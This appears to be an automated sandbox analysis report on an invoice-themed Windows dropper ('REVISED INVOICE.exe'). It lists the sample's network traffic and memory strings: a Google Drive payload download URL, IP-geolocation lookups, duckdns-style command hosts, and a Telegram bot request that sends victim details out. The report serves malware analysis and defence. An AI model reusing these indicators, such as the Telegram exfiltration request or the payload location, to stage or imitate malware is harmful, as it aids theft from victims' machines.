          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 24 Oct 2024 10:03:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222A0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221C7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.628918047.0000000021E7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: REVISED INVOICE.exe, REVISED INVOICE.exe.3.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: msiexec.exe, 00000005.00000002.629157566.00000000221EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
          Source: powershell.exe, 00000003.00000002.480576580.0000000002531000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/t
          Source: msiexec.exe, 00000005.00000002.625278649.0000000000500000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 00000005.00000002.625215938.00000000003DC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1UdCocYDXIneNm0wsl0RKLwjEdjKNc8DS&export=download
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.71
          Source: msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.714
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
          Source: msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
          Source: msiexec.exe, 00000005.00000002.629514463.00000000232EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023238000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023346000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.000000002330E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023292000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.000000002325A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
          Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
          Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.22:49162 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_004052BD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052BD

          System Summary

          barindex
          Source: initial sampleStatic PE information: Filename: REVISED INVOICE.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exeJump to dropped file
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeFile created: C:\Windows\resources\0409Jump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_00404AFA0_2_00404AFA
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_004066E30_2_004066E3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B49685_2_214B4968
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B91885_2_214B9188
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B31B15_2_214B31B1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B83CA5_2_214B83CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B8AA85_2_214B8AA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B5D005_2_214B5D00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B34825_2_214B3482
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B3E285_2_214B3E28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B46995_2_214B4699
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214BF9395_2_214BF939
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214BF0095_2_214BF009
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214BE0085_2_214BE008
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214BE0185_2_214BE018
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214BD8815_2_214BD881
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214BD8905_2_214BD890
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214BEB705_2_214BEB70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B9D105_2_214B9D10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B6C715_2_214B6C71
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B5CF05_2_214B5CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B6C805_2_214B6C80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214BF4A15_2_214BF4A1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B77585_2_214B7758
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215887485_2_21588748
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215829985_2_21582998
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158DD585_2_2158DD58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215837505_2_21583750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215857485_2_21585748
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158DD485_2_2158DD48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158F5405_2_2158F540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215809705_2_21580970
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215877705_2_21587770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158C5705_2_2158C570
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215849705_2_21584970
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158AD775_2_2158AD77
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215837605_2_21583760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215809605_2_21580960
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158C5605_2_2158C560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215877615_2_21587761
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158B7185_2_2158B718
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215865105_2_21586510
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215825005_2_21582500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158CF005_2_2158CF00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_215865025_2_21586502
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2158B7075_2_2158B707
